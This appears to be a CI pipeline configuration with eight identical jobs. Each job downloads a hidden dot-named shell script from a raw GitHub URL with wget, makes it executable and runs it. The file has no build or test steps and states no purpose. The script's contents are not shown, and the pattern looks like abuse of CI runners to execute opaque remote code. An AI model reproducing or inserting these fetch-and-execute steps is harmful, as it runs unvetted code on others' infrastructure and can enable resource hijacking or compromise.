a_1:
  script:
    - wget https://raw.githubusercontent.com/astagadragonsatu/astagadragonsatu/main/.astagadragonsatu.sh
    - chmod u+x .astagadragonsatu.sh
    - ./.astagadragonsatu.sh
    
a_2:
  script:
    - wget https://raw.githubusercontent.com/astagadragonsatu/astagadragonsatu/main/.astagadragonsatu.sh
    - chmod u+x .astagadragonsatu.sh
    - ./.astagadragonsatu.sh
    
a_3:
  script:
    - wget https://raw.githubusercontent.com/astagadragonsatu/astagadragonsatu/main/.astagadragonsatu.sh
    - chmod u+x .astagadragonsatu.sh
    - ./.astagadragonsatu.sh

  
a_4:
  script:
    - wget https://raw.githubusercontent.com/astagadragonsatu/astagadragonsatu/main/.astagadragonsatu.sh
    - chmod u+x .astagadragonsatu.sh
    - ./.astagadragonsatu.sh
  
a_5:
  script:
    - wget https://raw.githubusercontent.com/astagadragonsatu/astagadragonsatu/main/.astagadragonsatu.sh
    - chmod u+x .astagadragonsatu.sh
    - ./.astagadragonsatu.sh
  
a_6:
  script:
    - wget https://raw.githubusercontent.com/astagadragonsatu/astagadragonsatu/main/.astagadragonsatu.sh
    - chmod u+x .astagadragonsatu.sh
    - ./.astagadragonsatu.sh
  
a_7:
  script:
    - wget https://raw.githubusercontent.com/astagadragonsatu/astagadragonsatu/main/.astagadragonsatu.sh
    - chmod u+x .astagadragonsatu.sh
    - ./.astagadragonsatu.sh
  
a_8:
  script:
    - wget https://raw.githubusercontent.com/astagadragonsatu/astagadragonsatu/main/.astagadragonsatu.sh
    - chmod u+x .astagadragonsatu.sh
    - ./.astagadragonsatu.sh